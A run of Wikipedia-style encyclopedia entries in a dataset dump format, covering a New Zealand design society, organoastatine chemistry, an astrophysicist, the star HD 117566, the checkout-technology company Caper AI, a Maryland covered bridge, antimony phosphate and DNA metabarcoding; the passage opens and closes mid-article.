For efforts to leverage hybridization to improve perennial crops to be successful, there need to be continued efforts toward building a broad collection of crop wild relatives, genomic sequencing of related species, creating and phenotyping desired hybrid populations, and developing a network for genotype and phenotype associations and locate phenotype into crop breeding pipelines. Hybridization among perennials is also of interest because they may hybridize naturally or artificially with annual crops. For one of the most dietarily and economically significant examples, Dewey 1984 finds that a perennial Agropyron has hybridized with hexaploid wheat. Dewey finds an ancient hybridization event contributed significantly to the modern hexaploid multi-genome and as with all other currently grown Triticeae crops, wheat is an annual.
References
Perennials
Hybridization | Hybridization in perennial plants | [
"Biology"
] | 697 | [
"Hybrid plants",
"Plants",
"Hybrid organisms"
] |
72,525,295 | https://en.wikipedia.org/wiki/New%20Zealand%20Society%20of%20Industrial%20Designers | The New Zealand Society of Industrial Designers, known as NZSID, formed in 1959, was a professional body for designers in New Zealand. Its membership was multi-disciplinary, representing designers in all branches of design for industry—interior, product, furniture, graphic, packaging, exhibition, apparel, design education, design management... It was rebranded New Zealand Society of Designers (NZSD) and reconstituted on 28 May 1988 with a full-time office, the Designers Secretariat, from 1 August, and The Best New Zealand Graphic Design Awards scheme from 1 October.
The Society merged with the New Zealand Association of Interior Designers (NZAID) to form a new society, the Designers Institute of New Zealand (DINZ), in April 1991, which was incorporated on 23 August 1991. NZSID and NZAID were formally dissolved as incorporated societies on 11 August and 10 October 2000 respectively.
Regional groups
Three regional groups (branches) were established on 18 February 1967—two in North Island, following the boundary of Auckland Province, and one in South Island:
New Zealand Society of Industrial Designers, Northern Region (Auckland)
New Zealand Society of Industrial Designers, Central Region (Wellington)
New Zealand Society of Industrial Designers, Southern Region (Christchurch)
Officers
Presidents
1959–1959: Hugh Johansen (Provisional Chairman)
1959–1960: Robert Ellis
1960–1962: Peter Parsons †
1962–1963: Paul Beadle
1963–1965: Keith Mosheim
1965–1969: Douglas Heath
1969–1971: Noel Tritton
1971–1973: Don Haynes
1973–1977: Keverne Trevelyan
1977–1981: Michael Smythe
1981–1984: Peter Haythornthwaite
1984–1986: Monica Schaer-Vance
1986–1988: Rudi Schwarz
1988–1992: Mark Adams
† Unconfirmed
Vice-presidents, councillors, secretaries and treasurers (A-Z)
Some members serving various terms, 1959–1992, with indication of office (VP, C, S, T):
Mark Adams (C), Maurice Askew (VP, C), Paul Beadle (VP, C), Jan Beck (C), A. J. Bisley (C), Frank Carpay (C), Mark Cleverly (C), James Coe (VP, C), Kate Coolahan (C), John Crichton (C), Gary Couchman (C), K. Crook (C), John Densem (C), W. J. E. Dodds (C), Gray Dixon (C), Robert Drake (C, S), H. B. Ellis (C), B. Ellis (C), E. Fox (C), Hamish Keith (C), Stephen Green, Peder Hansen (C, S), Don Hatcher (C), Don Haynes (VP, C, S, T), K. Hawkins (C), Max Hailstone (C), Peter Haythornthwaite (C, S), Douglas Heath (VP, C), Gifford Jackson (C), J. Laird (C), Don Little (C, S), Gerry Luhman (C), Clive Luscombe (C), M. J. Mason (C), Stan Mauger (C), Lindsay Missen (C), Keith Mosheim (VP), Geoff Nees (VP, C), Michael Penck (C), Peter Parsons (C, S), G. Percy (C), Mark Pennington (C), Ben Petts (C), G. Preston (C), Don Ramage (C), P. Richings (C), Jolyon Saunders (VP, C, S, T), Monica Schaer (C), Rudi Schwarz (C), Ann Shanks (C), Graham Simpson (C), Michael Smythe (C, S), Richard T. Te One (C), Ray Thorburn (C), Keverne Trevelyan (C), Noel Tritton (VP, C), Bill Tunnicliffe (C), Rowland Walsh (C), Elly van de Wijdeven (C), Erwin T. Winkler (C), Tony Winter (C, S), John Woodruffe (C, T), B. Yap (C), Edward J. Zagorski (C)
Executive Director, Designers Secretariat
1988–1992: Michael Smythe
Publications
SID Scene (1970–). Nos. 1–. Christchurch: New Zealand Society of Industrial Designers Inc.; Designprint Press Ltd. Bi-monthly membership newsletter.
Designz (November 1973–November December 1985). Original series nos. 1–39. Auckland: New Zealand Society of Industrial Designers Inc. – via Auckland Libraries; National Library of New Zealand.
Designz: Magazine of the New Zealand Society of Designers Inc. (September 1988–December 1990). New series nos. 1–7. New Zealand Society of Designers Inc. ISSN: 1170-6686 – via Auckland Libraries; National Library of New Zealand.
References
External links
Designers Institute of New Zealand
Design institutions
New Zealand design
Learned societies of New Zealand
Organizations established in 1959
Arts organizations established in 1959 | New Zealand Society of Industrial Designers | [
"Engineering"
] | 1,079 | [
"Design",
"Design institutions"
] |
72,527,197 | https://en.wikipedia.org/wiki/Organoastatine%20chemistry | Organoastatine chemistry describes the synthesis and properties of organoastatine compounds, chemical compounds containing a carbon to astatine chemical bond.
Astatine is extremely radioactive, with the longest-lived isotope (210At) having a half-life of only 8.1 hours. Consequently, organoastatine chemistry can only be studied by tracer techniques on extremely small quantities. The problems caused by radiation damage as well as difficulties in separation and identification are worse for organic astatine derivatives than for inorganic compounds. Most studies of organoastatine chemistry focus on 211At (half-life 7.21 hours), which is the subject of ongoing studies in nuclear medicine: it is better than 131I at destroying abnormal thyroid tissue.
Astatine-labelled iodine reagents have been used to synthesise RAt, RAtCl2, R2AtCl, and RAtO2 (R = phenyl or p-tolyl). Alkyl and aryl astatides are relatively stable and have been analysed at high temperatures (120 °C) with radio gas chromatography. Demercuration reactions have produced with good yields trace quantities of 211At-containing aromatic amino acids, steroids, and imidazoles, among other compounds.
Astatine has both halogen-like and metallic properties, so that analogies with iodine sometimes hold, but sometimes do not. Astatine can be incorporated into organic molecules via halogen exchange, halodediazotation (replacing a diazonium group), halodeprotonation, or halodemetallation. Initial attempts to radiolabel proteins with 211At exemplify its intermediate behaviour, as astatination (analogous to radioiodination) produces unstable results and it is instead AtO+ (or a hydrolysed species) that probably bonds to proteins. Two-step procedures are used today, first synthesising stable astatoaryl prosthetic groups before incorporating them into the protein. Not only is the C–At bond the weakest of all carbon–halogen bonds (following periodic trends), but also the bond easily breaks as the astatine is oxidised back to free astatine.
References
Further reading
Astatine
Organometallic chemistry | Organoastatine chemistry | [
"Chemistry"
] | 470 | [
"Organometallic chemistry"
] |
72,528,837 | https://en.wikipedia.org/wiki/Stefano%20Bianchi | Stefano Bianchi is an Italian astrophysicist who is currently an Associate Professor at the Mathematics and Physics Department of Università degli Studi Roma Tre in Rome, Italy. He is an INAF Associate and an IAU Member.
Education and career
Bianchi's research interests include different aspects of high-energy astrophysics, focusing on black holes, Active Galactic Nuclei, and X-ray Binaries. He is a member of the NASA/ASI IXPE Science Team and of the ESA XMM-Newton Users' Group. He is involved in the science definition of the future ESA missions Athena and LISA. He has translated three popular science books into Italian.
Main awards
Bruno Rossi Prize 2024, as a member of the IXPE Team
"Città di Monselice" award for Scientific Translation (2007)
Memberships
European Space Agency XMM-Newton Users' Group (2019–present)
Review Editor for Frontiers in Astronomy and Space Sciences
Editorial Board Member for Galaxies
Member of the IXPE Science Team
Member of the IAU
Books and articles
Bianchi has translated three popular science books into Italian.
Hans Christian von Baeyer, , traduzione di Stefano Bianchi, collana La Scienza Nuova, edizioni Dedalo, 2005, p. 296,
Tom Siegfried, L'Universo strano. Idee al confine dello spazio-tempo, traduzione di Stefano Bianchi, collana La Scienza Nuova, edizioni Dedalo, 2007, p. 352,
Dan Hooper, Il lato oscuro dell'universo. Dove si nascondono energia e materia, traduzione di Stefano Bianchi, collana La Scienza Nuova, edizioni Dedalo, 2008, p. 240,
Selected papers
References
1976 births
Living people
Astrophysicists
Italian astrophysicists
Academic staff of Roma Tre University
21st-century Italian physicists
Roma Tre University alumni | Stefano Bianchi | [
"Physics"
] | 422 | [
"Astrophysicists",
"Astrophysics"
] |
72,529,452 | https://en.wikipedia.org/wiki/HD%20117566 | HD 117566, also known as HR 5091, is a solitary yellow-hued star located in the northern circumpolar constellation Camelopardalis. It has an apparent magnitude of 5.74, making it faintly visible to the naked eye. This object is relatively close at a distance of 291 light years based on Gaia DR3 parallax measurements but is receding with a heliocentric radial velocity of . At its current distance, HD 117566's brightness is diminished by 0.12 magnitudes due to interstellar dust.
HD 117566 has a stellar classification of G3 IIIb Fe−1 CH1, indicating that it is a G-type giant with an under-abundance of iron and an overabundance of the CH radical in its spectrum. Its evolutionary stage is unclear. A 1994 paper places it in the Hertzsprung gap, indicating it has ceased hydrogen core fusion and is now evolving toward the red giant branch (RGB). However, Mishenina et al. (2006) said that HD 117566 is already past the RGB and is on the horizontal branch, fusing helium at its core. Nevertheless, it has 2.29 times the mass of the Sun and, at the age of 760 million years, it has expanded to 7.2 times the Sun's radius. It radiates 38.2 times the luminosity of the Sun from its photosphere at an effective temperature of . HD 117566 has a solar metallicity and spins modestly with a projected rotational velocity of .
References
G-type giants
Carbon stars
Horizontal-branch stars
Camelopardalis
BD+79 00422
117566
065595
5091 | HD 117566 | [
"Astronomy"
] | 358 | [
"Camelopardalis",
"Constellations"
] |
66,618,358 | https://en.wikipedia.org/wiki/Foxcatcher%20Farm%20Covered%20Bridge | Foxcatcher Farm Covered Bridge, also known as Big Elk Creek Covered Bridge and Fair Hill Covered Bridge, is a Burr truss wooden covered bridge near Fair Hill, Maryland, United States.
History
The bridge crosses Big Elk Creek and is surrounded by the Fair Hill Natural Resources Management Area, the former land holdings of William du Pont Jr. The crossing was originally called Strahorn's Mill Bridge after Strahorn's Mill - one of the properties purchased by William du Pont Jr. in 1927 to create his Foxcatcher Farm estate, which was named after his thoroughbred racing stable.
The bridge was originally constructed in 1860 by Ferdinand Wood and was substantially reconstructed in 1992. Foxcatcher Farm Covered Bridge was designated as a Maryland Historic Civil Engineering Landmark by the American Society of Civil Engineers in 1994.
See also
List of covered bridges in Maryland
References
External links
Big Elk Creek Covered Bridge, (Fair Hill Covered Bridge, Foxcatcher Farm Covered Bridge) at Maryland Historical Trust
Fair Hill Estate Historic District, (Fair Hill Natural Resources Management Area)) at Maryland Historical Trust
Bridges in Cecil County, Maryland
Covered bridges in Maryland
Burr Truss bridges in the United States
Historic Civil Engineering Landmarks
Tourist attractions in Cecil County, Maryland
Wooden bridges in Maryland | Foxcatcher Farm Covered Bridge | [
"Engineering"
] | 246 | [
"Civil engineering",
"Historic Civil Engineering Landmarks"
] |
66,618,624 | https://en.wikipedia.org/wiki/Caper%20AI | Caper is a software technology company that develops and deploys AI-powered automated checkout devices as well as AI-based software applications for retailers, grocers, convenience stores and other general merchandising store formats. Caper AI was established in 2016 by Lindon Gao, York Yang, Yilin Huang and Ahmed Beshry. It is headquartered in Manhattan, New York.
In October 2021, American retail delivery company Instacart acquired Caper for $350 million.
History
The company was founded in 2016 by Lindon Gao, York Yang, Yilin Huang and Ahmed Beshry with its main office based in New York. Since its inception, the company focused on the development of automated checkout software to grocery retailers. Caper AI closed its series A round of funding for US$10 million in 2019. In 2019, Sobeys, the second-largest food retailer in Canada, publicly announced about commercial deployment of the Caper's Smart Cart technology with its first location being at Glen Abbey Sobeys supermarket in Oakville, Ontario. As Grocery Dive notes, "The novel coronavirus pandemic has accelerated the deployment of programs that help shoppers get in and get out from stores as quickly as possible". According to Wall Street Journal and Washington Post, Caper's technology started to roll out in the US and Canada grocery stores in 2019. The deployments include Foodcellar & Co., C-town, Met Fresh Market, Pioneer Supermarkets, Gala Fresh Farms and Brooklyn Fare, among others. In autumn 2020, the company introduced Caper Counter, a cashierless countertop for small grocery stores under 10 000 sq feet and fewer than 10K SKUs with a software applying machine learning algorithms, computer vision and Sensor Fusion technology.
In 2020, one of the largest American chain retailers, Kroger, launched "KroGo" AI-powered shopping carts developed by Caper AI. The pilot program was introduced at one of its stores in Cincinnati, Ohio. Grocery chain Schnucks, Shoprite, and Fairway Market stores all rolled out the AI-powered shopping carts in 2023.
In Fall 2024, Instacart launched Caper Carts internationally, with ALDI in Austria and Coles Supermarket in Australia.
Technology
Caper AI uses several technologies to automate the retail checkout process, including computer vision, machine learning and sensor fusion. Caper’s technology has multiple cameras and lights to capture images. AI and deep learning are used to pre-train the system to recognize products within the stores The technology can recognize products that are similar or identical by differentiating between them based on textual information and size.
See also
Automated retail
Cashless society
Amazon Go
Self-checkout
References
Technology companies of the United States
Technology companies based in New York (state)
Retail processes and techniques
Automation organizations
Payment systems
Payment methods in retailing
Artificial intelligence companies
2021 mergers and acquisitions | Caper AI | [
"Engineering"
] | 593 | [
"Automation organizations",
"Automation"
] |
66,618,956 | https://en.wikipedia.org/wiki/Antimony%20orthophosphate | Antimony phosphate, (also called antimony orthophosphate, or antimonous phosphate) is a chemical compound of antimony and phosphate with formula . Antimony is in the form Sb(III) with +3 oxidation state. Antimony atoms have a lone pair of electrons.
Layered form
occurs as a layered compound. Two-dimensional layers are weakly held together by electrostatic forces. is one of the most compressible materials, and under pressure compresses more perpendicular to the layers. At standard conditions crystallises in a monoclinic form with space group P21/m. Antimony phosphate has been investigated for use in lithium ion and sodium ion batteries.
Antimony atoms are attached to four oxygen atoms. These atoms are arranged as a squarish pyramid with antimony at the apex. Antimony atoms form the top and bottom of the layers. Four oxygen atoms are arranged tetrahedrally around phosphorus. Antimony to oxygen bond lengths are 1.98 2.04 2.18 and 2.93 Å. the O-Sb-O angles are 87.9 164.8 84.1 and 85.0°. The structure of differs from two forms of BiPO4, where bismuth associates with five or eight phosphate groups.
In the 31P chemical shift is −18 ppm. The binding energy of the 2p electrons of phosphorus atom as determined by XPS is 133.9 eV.
When the pressure exceeds 3 GPa, bonds form between the layers, but it retains the monoclinic system. But when the pressure is between 9 and 20 GPa, it transitions to a triclinic form with space group P. 10.1021/acs.inorgchem.9b02268
The infrared spectrum shows absorption bands at 1145, 1052, and 973, 664, 590, 500, 475, and 372 cm−1. These are due to vibrations in P-O and Sb-O bonds and also bending in O-P-O bonds.
Antimony(V) phosphate
Antimony(V) phosphate has monoclinic crystals. It has space group C2c. The unit cell has dimensions a = 6.791 Å, b = 8.033 Å, c = 7.046 Å, and β = 115.90°, with number of formula per unit cell of Z = 4. It is formed by heating and . At 1218 K it loses oxygen to become antimony(III) phosphate.
Formation
may be formed by soaking antimonous oxide in pure phosphoric acid and then filtering the solid, and heating to 600 °C.
A related method involves heating a water solution of phosphoric acid with antimonous oxide at about 120 °C.
Yet another procedure involves heating diammonium phosphate with antimonous oxide at 600 °C.
Reactions
reacts with bases such as ammonia, hydrazine and ethylenediamine to form and hydrogenphosphate salts.
However intercalation is also claimed with amines. Intercalation of amines expands the a axis of the crystals, but leaves c, and c dimensions unaltered. The β angle is reduced. This is due to a bilayer of molecules inserting between each layer in the original crystal.
There are also double salts where phosphate groups are joined to antimony.
List
References
Phosphates
Antimony(III) compounds | Antimony orthophosphate | [
"Chemistry"
] | 700 | [
"Phosphates",
"Salts"
] |
66,619,486 | https://en.wikipedia.org/wiki/Metabarcoding | Metabarcoding is the barcoding of DNA/RNA (or eDNA/eRNA) in a manner that allows for the simultaneous identification of many taxa within the same sample. The main difference between barcoding and metabarcoding is that metabarcoding does not focus on one specific organism, but instead aims to determine species composition within a sample.
A barcode consists of a short variable gene region (for example, see different markers/barcodes) which is useful for taxonomic assignment flanked by highly conserved gene regions which can be used for primer design. This idea of general barcoding originated in 2003 from researchers at the University of Guelph.
The metabarcoding procedure, like general barcoding, proceeds in order through stages of DNA extraction, PCR amplification, sequencing and data analysis. Different genes are used depending if the aim is to barcode single species or metabarcoding several species. In the latter case, a more universal gene is used. Metabarcoding does not use single species DNA/RNA as a starting point, but DNA/RNA from several different organisms derived from one environmental or bulk sample.
Environmental DNA
Environmental DNA or eDNA describes the genetic material present in environmental samples such as sediment, water, and air, including whole cells, extracellular DNA and potentially whole organisms. eDNA can be captured from environmental samples and preserved, extracted, amplified, sequenced, and categorized based on its sequence. From this information, detection and classification of species is possible. eDNA may come from skin, mucous, saliva, sperm, secretions, eggs, feces, urine, blood, roots, leaves, fruit, pollen, and rotting bodies of larger organisms, while microorganisms may be obtained in their entirety. eDNA production is dependent on biomass, age and feeding activity of the organism as well as physiology, life history, and space use.
By 2019 methods in eDNA research had been expanded to be able to assess whole communities from a single sample. This process involves metabarcoding, which can be precisely defined as the use of general or universal polymerase chain reaction (PCR) primers on mixed DNA samples from any origin followed by high-throughput next-generation sequencing (NGS) to determine the species composition of the sample. This method has been common in microbiology for years, but, as of 2020, it is only just finding its footing in the assessment of macroorganisms. Ecosystem-wide applications of eDNA metabarcoding have the potential to not only describe communities and biodiversity, but also to detect interactions and functional ecology over large spatial scales, though it may be limited by false readings due to contamination or other errors. Altogether, eDNA metabarcoding increases speed, accuracy, and identification over traditional barcoding and decreases cost, but needs to be standardized and unified, integrating taxonomy and molecular methods for full ecological study.
eDNA metabarcoding has applications to diversity monitoring across all habitats and taxonomic groups, ancient ecosystem reconstruction, plant-pollinator interactions, diet analysis, invasive species detection, pollution responses, and air quality monitoring. eDNA metabarcoding is a unique method still in development and will likely remain in flux for some time as technology advances and procedures become standardized. However, as metabarcoding is optimized and its use becomes more widespread, it is likely to become an essential tool for ecological monitoring and global conservation study.
Community DNA
Since the inception of high‐throughput sequencing (HTS), the use of metabarcoding as a biodiversity detection tool has drawn immense interest. However, there has yet to be clarity regarding what source material is used to conduct metabarcoding analyses (e.g., environmental DNA versus community DNA). Without clarity between these two source materials, differences in sampling, as well as differences in laboratory procedures, can impact subsequent bioinformatics pipelines used for data processing, and complicate the interpretation of spatial and temporal biodiversity patterns. Here, we seek to clearly differentiate among the prevailing source materials used and their effect on downstream analysis and interpretation for environmental DNA metabarcoding of animals and plants compared to that of community DNA metabarcoding.
With community DNA metabarcoding of animals and plants, the targeted groups are most often collected in bulk (e.g., soil, malaise trap or net), and individuals are removed from other sample debris and pooled together prior to bulk DNA extraction. In contrast, macro‐organism eDNA is isolated directly from an environmental material (e.g., soil or water) without prior segregation of individual organisms or plant material from the sample and implicitly assumes that the whole organism is not present in the sample. Of course, community DNA samples may contain DNA from parts of tissues, cells and organelles of other organisms (e.g., gut contents, cutaneous intracellular or extracellular DNA). Likewise, macro‐organism eDNA samples may inadvertently capture whole microscopic nontarget organisms (e.g., protists, bacteria). Thus, the distinction can at least partly break down in practice.
Another important distinction between community DNA and macro‐organism eDNA is that sequences generated from community DNA metabarcoding can be taxonomically verified when the specimens are not destroyed in the extraction process. Here, sequences can then be generated from voucher specimens using Sanger sequencing. As the samples for eDNA metabarcoding lack whole organisms, no such in situ comparisons can be made. Taxonomic affinities can therefore only be established by directly comparing obtained sequences (or through bioinformatically generated operational taxonomic units (MOTUs)), to sequences that are taxonomically annotated such as NCBI's GenBank nucleotide database, BOLD, or to self‐generated reference databases from Sanger‐sequenced DNA. (The molecular operational taxonomic unit (MOTU) is a group identified through use of cluster algorithms and a predefined percentage sequence similarity, for example, 97%)). Then, to at least partially corroborate the resulting list of taxa, comparisons are made with conventional physical, acoustic or visual‐based survey methods conducted at the same time or compared with historical records from surveys for a location (see Table 1).
The difference in source material between community DNA and eDNA therefore has distinct ramifications for interpreting the scale of inference for time and space about the biodiversity detected. From community DNA, it is clear that the individual species were found in that time and place, but for eDNA, the organism that produced the DNA may be upstream from the sampled location, or the DNA may have been transported in the faeces of a more mobile predatory species (e.g., birds depositing fish eDNA, or was previously present, but no longer active in the community and detection is from DNA that was shed years to decades before. The latter means that the scale of inference both in space and in time must be considered carefully when inferring the presence for the species in the community based on eDNA.
Metabarcoding stages
There are six stages or steps in DNA barcoding and metabarcoding. The DNA barcoding of animals (and specifically of bats) is used as an example in the diagram at the right and in the discussion immediately below.
First, suitable DNA barcoding regions are chosen to answer some specific research question. The most commonly used DNA barcode region for animals is a segment about 600 base pairs long of the mitochondrial gene cytochrome oxidase I (CO1). This locus provides large sequence variation between species yet relatively small amount of variation within species. Other commonly used barcode regions used for species identification of animals are ribosomal DNA (rDNA) regions such as 16S, 18S and 12S and mitochondrial regions such as cytochrome B. These markers have advantages and disadvantages and are used for different purposes. Longer barcode regions (at least 600 base pairs long) are often needed for accurate species delimitation, especially to differentiate close relatives. Identification of the producer of organism's remains such as faeces, hairs and saliva can be used as a proxy measure to verify absence/presence of a species in an ecosystem. The DNA in these remains is usually of low quality and quantity, and therefore, shorter barcodes of around 100 base pairs long are used in these cases. Similarly, DNA remains in dung are often degraded as well, so short barcodes are needed to identify prey consumed.
Second, a reference database needs to be built of all DNA barcodes likely to occur in a study. Ideally, these barcodes need to be generated from vouchered specimens deposited in a publicly accessible place, such as for instance a natural history museum or another research institute. Building up such reference databases is currently being done all over the world. Partner organizations collaborate in international projects such as the International Barcode of Life Project (iBOL) and Consortium for the Barcode of Life (CBOL), aiming to construct a DNA barcode reference that will be the foundation for DNA‐based identification of the world's biome. Well‐known barcode repositories are NCBI GenBank and the Barcode of Life Data System (BOLD).
Third, the cells containing the DNA of interest must be broken open to expose its DNA. This step, DNA extractions and purifications, should be performed from the substrate under investigation. There are several procedures available for this. Specific techniques must be chosen to isolate DNA from substrates with partly degraded DNA, for example fossil samples, and samples containing inhibitors, such as blood, faeces and soil. Extractions in which DNA yield or quality is expected to be low should be carried out in an ancient DNA facility, together with established protocols to avoid contamination with modern DNA. Experiments should always be performed in duplicate and with positive controls included.
Fourth, amplicons have to be generated from DNA extracted, either from a single specimen or from complex mixtures with primers based on DNA barcodes selected under step 1. To keep track of their origin, labelled nucleotides (molecular IDs or MID labels) need to be added in case of metabarcoding. These labels are needed later on in the analyses to trace reads from a bulk data set back to their origin.
Fifth, the appropriate techniques should be chosen for DNA sequencing. The classic Sanger chain‐termination method relies on the selective incorporation of chain‐elongating inhibitors of DNA polymerase during DNA replication. These four bases are separated by size using electrophoresis and later identified by laser detection. The Sanger method is limited and can produce a single read at the same time and is therefore suitable to generate DNA barcodes from substrates that contain only a single species. Emerging technologies such as nanopore sequencing have resulted in the cost of DNA sequencing reducing from about USD 30,000 per megabyte in 2002 to about USD 0.60 in 2016. Modern next-generation sequencing (NGS) technologies can handle thousands to millions reads in parallel and are therefore suitable for mass identification of a mix of different species present in a substrate, summarized as metabarcoding.
Finally, bioinformatic analyses need to be carried out to match DNA barcodes obtained with Barcode Index Numbers (BINs) in reference libraries. Each BIN, or BIN cluster, can be identified to species level when it shows high (>97%) concordance with DNA barcodes linked to a species present in a reference library, or when taxonomic identification to the species level is still lacking, an operational taxonomic unit (OTU), which refers to a group of species (i.e. genus, family or higher taxonomic rank). (See binning (metagenomics)). The results of the bioinformatics pipeline must be pruned, for example by filtering out unreliable singletons, superfluous duplicates, low‐quality reads and/or chimeric reads. This is generally done by carrying out serial BLAST searches in combination with automatic filtering and trimming scripts. Standardized thresholds are needed to discriminate between different species or a correct and a wrong identification.
Metabarcoding workflow
Despite the obvious power of the approach, eDNA metabarcoding is affected by precision and accuracy challenges distributed throughout the workflow in the field, in the laboratory and at the keyboard. As set out in the diagram at the right, following the initial study design (hypothesis/question, targeted taxonomic group etc) the current eDNA workflow consists of three components: field, laboratory and bioinformatics. The field component consists of sample collection (e.g., water, sediment, air) that is preserved or frozen prior to DNA extraction. The laboratory component has four basic steps: (i) DNA is concentrated (if not performed in the field) and purified, (ii) PCR is used to amplify a target gene or region, (iii) unique nucleotide sequences called "indexes" (also referred to as "barcodes") are incorporated using PCR or are ligated (bound) onto different PCR products, creating a "library" whereby multiple samples can be pooled together, and (iv) pooled libraries are then sequenced on a high‐throughput machine. The final step after laboratory processing of samples is to computationally process the output files from the sequencer using a robust bioinformatics pipeline.
OTUs and the species concept
Method and visualisation
The method requires each collected DNA to be archived with its corresponding "type specimen" (one for each taxon), in addition to the usual collection data. These types are stored in specific institutions (museums, molecular laboratories, universities, zoological gardens, botanical gardens, herbaria, etc.) one for each country, and in some cases, the same institution is assigned to contain the types of more than a country, in cases where some nations do not have the technology or financial resources to do so.
In this way, the creation of type specimens of genetic codes represents a methodology parallel to that carried out by traditional taxonomy.
In a first stage, the region of the DNA that would be used to make the barcode was defined. It had to be short and achieve a high percentage of unique sequences. For animals, algae and fungi, a portion of a mitochondrial gene which codes for subunit 1 of the cytochrome oxidase enzyme, CO1, has provided high percentages (95%), a region around 648 base pairs.
In the case of plants, the use of CO1 has not been effective since they have low levels of variability in that region, in addition to the difficulties that are produced by the frequent effects of polyploidy, introgression, and hybridization, so the chloroplast genome seems more suitable .
Applications
Pollinator networks
The diagram on the right shows a comparison of pollination networks based on DNA metabarcoding with more traditional networks based on direct observations of insect visits to plants. By detecting numerous additional hidden interactions, metabarcoding data largely alters the properties of the pollination networks compared to visit surveys. Molecular data shows that pollinators are much more generalist than expected from visit surveys. However, pollinator species were composed of relatively specialized individuals and formed functional groups highly specialized upon floral morphs.
As a consequence of the ongoing global changes, a dramatic and parallel worldwide decline in pollinators and animal-pollinated plant species has been observed. Understanding the responses of pollination networks to these declines is urgently required to diagnose the risks the ecosystems may incur as well as to design and evaluate the effectiveness of conservation actions. Early studies on animal pollination dealt with simplified systems, i.e. specific pairwise interactions or involved small subsets of plant-animal communities. However, the impacts of disturbances occur through highly complex interaction networks and, nowadays, these complex systems are currently a major research focus. Assessing the true networks (determined by ecological process) from field surveys that are subject to sampling effects still provides challenges.
Recent research studies have clearly benefited from network concepts and tools to study the interaction patterns in large species assemblages. They showed that plant-pollinator networks were highly structured, deviating significantly from random associations. Commonly, networks have (1) a low connectance (the realized fraction of all potential links in the community) suggesting a low degree of generalization; (2) a high nestedness (the more-specialist organisms are more likely to interact with subsets of the species that more-generalist organisms interact with) the more specialist species interact only with proper subsets of those species interacting with the more generalist ones; (3) a cumulative distribution of connectivity (number of links per species, s) that follows a power or a truncated power law function characterized by few supergeneralists with more links than expected by chance and many specialists; (4) a modular organization. A module is a group of plant and pollinator species that exhibits high levels of within-module connectivity, and that is poorly connected to species of other groups.
The low level of connectivity and the high proportion of specialists in pollination networks contrast with the view that generalization rather than specialization is the norm in networks. Indeed, most plants species are visited by a diverse array of pollinators which exploit floral resources from a wide range of plant species. A main cause evoked to explain this apparent contradiction is the incomplete sampling of interactions. Indeed, most network properties are highly sensitive to sampling intensity and network size. Network studies are basically phytocentric i.e. based on the observations of pollinator visits to flowers. This plant-centered approach suffers nevertheless from inherent limitations which may hamper the comprehension of mechanisms contributing to community assembly and biodiversity patterns. First, direct observations of pollinator visits to certain taxa such as orchids are often scarce and rare interactions are very difficult to detect in field in general. Pollinator and plant communities usually are composed of few abundant species and many rare species that are poorly recorded in visit surveys. These rare species appear as specialists, whereas in fact they could be typical generalists. Because of the positive relationship between interaction frequency (f) and connectivity (s), undersampled interactions may lead to overestimating the degree of specialization in networks. Second, network analyses have mostly operated at species levels. Networks have very rarely been up scaled to the functional groups or down scaled to the individual-based networks, and most of them have been focused on one or two species only. The behavior of either individuals or colonies is commonly ignored, although it may influence the structure of the species networks. Species accounted as generalists in species networks could, therefore, entail cryptic specialized individuals or colonies. Third, flower visitors are by no means always effective pollinators as they may deposit no conspecific pollen and/or a lot of heterospecific pollen. Animal-centered approaches based on the investigation of pollen loads on visitors and plant stigmas may be more efficient at revealing plant-pollinator interactions.
Disentangling food webs
Metabarcoding offers new opportunities for deciphering trophic linkages between predators and their prey within food webs. Compared to traditional, time-consuming methods, such as microscopic or serological analyses, the development of DNA metabarcoding allows the identification of prey species without prior knowledge of the predator’s prey range. In addition, metabarcoding can also be used to characterize a large number of species in a single PCR reaction, and to analyze several hundred samples simultaneously. Such an approach is increasingly used to explore the functional diversity and structure of food webs in agroecosystems. Like other molecular-based approaches, metabarcoding only gives qualitative results on the presence/absence of prey species in the gut or fecal samples. However, this knowledge of the identity of prey consumed by predators of the same species in a given environment enables a "pragmatic and useful surrogate for truly quantitative information.
In food web ecology, "who eats whom" is a fundamental issue for gaining a better understanding of the complex trophic interactions existing between pests and their natural enemies within a given ecosystem. The dietary analysis of arthropod and vertebrate predators allows the identification of key predators involved in the natural control of arthropod pests and gives insights into the breadth of their diet (generalist vs. specialist) and intraguild predation.
The diagram on the right summarises results from a 2020 study which used metabarcoding to untangle the functional diversity and structure of the food web associated with a couple of millet fields in Senegal. After assigning the identified OTUs as species, 27 arthropod prey taxa were identified from nine arthropod predators. The mean number of prey taxa detected per sample was the highest in carabid beetles, ants and spiders, and the lowest in the remaining predators including anthocorid bugs, pentatomid bugs, and earwigs. Across predatory arthropods, a high diversity of arthropod preys was observed in spiders, carabid beetles, ants, and anthocorid bugs. In contrast, the diversity of prey species identified in earwigs and pentatomid bugs was relatively low. Lepidoptera, Hemiptera, Diptera and Coleoptera were the most common insect prey taxa detected from predatory arthropods.
Conserving functional biodiversity and related ecosystem services, especially by controlling pests using their natural enemies, offers new avenues to tackle challenges for the sustainable intensification of food production systems. Predation of crop pests by generalist predators, including arthropods and vertebrates, is a major component of natural pest control. A particularly important trait of most generalist predators is that they can colonize crops early in the season by first feeding on alternative prey. However, the breadth of the "generalist" diet entails some drawbacks for pest control, such as intra-guild predation. A tuned diagnosis of diet breadth in generalist predators, including predation of non-pest prey, is thus needed to better disentangle food webs (e.g., exploitation competition and apparent competition) and ultimately to identify key drivers of natural pest control in agroecosystems. However, the importance of generalist predators in the food web is generally difficult to assess, due to the ephemeral nature of individual predator–prey interactions. The only conclusive evidence of predation results from direct observation of prey consumption, identification of prey residues within predators’ guts, and analyses of regurgitates or feces.
Marine biosecurity
The spread of non-indigenous species (NIS) represents significant and increasing risks to ecosystems. In marine systems, NIS that survive the transport and adapt to new locations can have significant adverse effects on local biodiversity, including the displacement of native species, and shifts in biological communities and associated food webs. Once NIS are established, they are extremely difficult and costly to eradicate, and further regional spread may occur through natural dispersal or via anthropogenic transport pathways. While vessel hull fouling and ships’ ballast waters are well known as important anthropogenic pathways for the international spread of NIS, comparatively little is known about the potential of regionally transiting vessels to contribute to the secondary spread of marine pests through bilge water translocation.
